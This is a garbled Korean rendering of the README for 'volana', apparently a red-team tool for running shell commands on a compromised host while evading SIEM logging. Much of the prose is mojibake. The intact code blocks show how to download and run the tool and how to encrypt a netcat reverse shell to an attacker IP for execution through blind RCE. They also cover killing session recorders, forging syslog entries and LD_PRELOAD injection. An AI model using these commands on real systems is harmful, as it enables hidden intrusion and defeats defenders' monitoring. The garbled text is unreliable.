
๐ ์ ธ ๋ช ๋ น์ด ๋๋ ํ๋ฅผ ํตํ ํ์ง ์์คํ ํํผ
์นจํฌ ํ
์คํธ ์ค ์ค์ํ ์ธก๋ฉด์ ์๋ฐํจ(stealth)์
๋๋ค. ๋ฐ๋ผ์ ์์
ํ ํ์ ์ ์ง์์ผ ํฉ๋๋ค. ๊ทธ๋ฌ๋ ๋ง์ ์ธํ๋ผ๋ ๋ช
๋ น์ ๊ธฐ๋กํ๊ณ ์ค์๊ฐ์ผ๋ก SIEM์ ์ ์กํ์ฌ ์ฌํ ์ ๋ฆฌ๋ง์ผ๋ก๋ ๋ฌด์ฉ์ง๋ฌผ์ด ๋ฉ๋๋ค.volana๋ ์์ฒด ์ ๋ฐํ์์ ์ ๊ณตํ์ฌ ์นจํด๋ ์์คํ
์์ ์คํ๋ ๋ช
๋ น์ ์จ๊ธฐ๋ ๊ฐ๋จํ ๋ฐฉ๋ฒ์ ์ ๊ณตํฉ๋๋ค (๋ช
๋ น์ ์
๋ ฅํ๋ฉด volana๊ฐ ์คํํฉ๋๋ค). ์ด๋ ๊ฒ ํ๋ฉด ์์
์ค์ ํ์ ์ ์ง์ธ ์ ์์ต๋๋ค.
์ธํฐ๋ํฐ๋ธ ์์ ํ๋ณดํด์ผ ํฉ๋๋ค. (์คํ ๋ฐฉ๋ฒ์ ์ฐพ์ผ์ธ์, ๋น์ ์ ํด์ปค์ ๋๋ค, ๊ทธ๊ฒ ๋น์ ์ ์ผ์ ๋๋ค! ๊ทธ๋ ์ง ์๋ค๋ฉด). ๊ทธ๋ฐ ๋ค์ ๋์ ๋จธ์ ์ ๋ค์ด๋ก๋ํ์ฌ ์คํํ์ธ์. ๊ทธ๊ฒ ๋ค์ ๋๋ค, ์ด์ ์๋ฐํ๊ฒ ์คํํ๋ ค๋ ๋ช ๋ น์ ์ ๋ ฅํ ์ ์์ต๋๋ค.
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana ยป echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana ยป [command]
volana ์ฝ์ ํค์๋:
ring: ๋ง ๋ชจ๋๋ฅผ ํ์ฑํํฉ๋๋ค. ์ฆ, ๊ฐ ๋ช
๋ น์ด ๋ค๋ฅธ ๋ง์ ๋ช
๋ น๊ณผ ํจ๊ป ์คํ๋์ด ์ถ์ ์ ์ํํฉ๋๋ค (์์คํ
ํธ์ถ์ ๋ชจ๋ํฐ๋งํ๋ ์๋ฃจ์
์ผ๋ก๋ถํฐ)exit: volana ์ฝ์ ์ข
๋ฃ๋น๋ํํ ์(์น์ ๋๋ ๋ธ๋ผ์ธ๋ RCE)์ด ์๋ค๊ณ ๊ฐ์ ํ๋ฉด, encrypt ๋ฐ decrypt ํ์ ๋ช
๋ น์ ์ฌ์ฉํ ์ ์์ต๋๋ค. ๋จผ์ , ๋ด์ฅ ์ํธํ ํค๋ก volana๋ฅผ ๋น๋ํด์ผ ํฉ๋๋ค.
๊ณต๊ฒฉ์ ๋จธ์ ์์
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
์ํธํ๋ ๋ช ๋ น์ ๋ณต์ฌํ์ฌ RCE๋ก ์คํํ์ธ์ ๋์ ๋จธ์ ์์
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
์ ๊ทธ๋ฅ echo [command] | base64 ๋ก ๋ช
๋ น์ ์จ๊ธฐ์ง ์๋์?
๊ทธ๋ฆฌ๊ณ ๋์์์ echo [encoded_command] | base64 -d | bash ๋ก ๋์ฝ๋ฉํ๋์?
์๋ํ๋ฉด ์ฐ๋ฆฌ๋ base64 ์ฌ์ฉ์ ๋ํด ๊ฒฝ๊ณ ๋ฅผ ๋ฐ์์ํค๊ฑฐ๋ ๋ช
๋ น์์ base64 ํ
์คํธ๋ฅผ ์ฐพ๋ ์์คํ
์ผ๋ก๋ถํฐ ๋ณดํธ๋ฐ๊ณ ์ถ๊ธฐ ๋๋ฌธ์
๋๋ค. ๋ํ ์กฐ์ฌ๋ฅผ ์ด๋ ต๊ฒ ๋ง๋ค๊ณ ์ถ์ผ๋ฉฐ base64๋ ์ค์ ์ฅ์ ๋ฌผ์ด ์๋๋๋ค.
volana๊ฐ ๋น์ ์ ์์ ํ ๋ณด์ด์ง ์๊ฒ ๋ง๋๋ ๊ธฐ์ ์ ์๋๋ผ๋ ์ ์ ๋ช
์ฌํ์ธ์. ๊ทธ ๋ชฉํ๋ ์นจ์
ํ์ง์ ์กฐ์ฌ๋ฅผ ๋ ์ด๋ ต๊ฒ ๋ง๋๋ ๊ฒ์
๋๋ค.
ํ์ง๋๋ค๋ ๊ฒ์ ํน์ ๋ช ๋ น์ด ์คํ๋์์ ๋ ๊ฒฝ๊ณ ๋ฅผ ํธ๋ฆฌ๊ฑฐํ ์ ์๋ ๊ฒฝ์ฐ๋ฅผ ์๋ฏธํฉ๋๋ค.
.bash_history, ".zsh_history" ๋ฑopensnoop)script, screen -L, sexonthebash, ovh-ttyrec, ๋ฑ)
pkill -9 scriptscreen์ ํํผํ๊ธฐ๊ฐ ์กฐ๊ธ ๋ ์ด๋ ต์ง๋ง, ์
๋ ฅ์ ๊ธฐ๋กํ์ง ์์ต๋๋ค (๋น๋ฐ ์
๋ ฅ: stty -echo => ํํผ)volana๋ก ํํผํ ์ ์์/var/log/auth.log)
sudo ๋๋ su ๋ช
๋ น์๋ง ํด๋นlogger -p auth.info "No hacker is poisoning your syslog solution, don't worry")LD_PRELOAD ์ฃผ์
ํด๋ฆญ๋ฒ ์ดํธ ์ ๋ชฉ ์ฃ์กํฉ๋๋ค๋ง, ๊ธฐ์ฌ์์๊ฒ๋ ๋์ด ์ง๊ธ๋์ง ์์ต๋๋ค. ๐
๋ค์์ ๋ฐ๊ฒฌํ์ จ๋ค๋ฉด ์๋ ค์ฃผ์ธ์:
volana๋ฅผ ํ์งํ๋ ๋ฐฉ๋ฒvolana ๋ช
๋ น์ ํ์งํ์ง ์๋ ์ฝ์ ๊ฐ์ ๋ฐฉ๋ฒ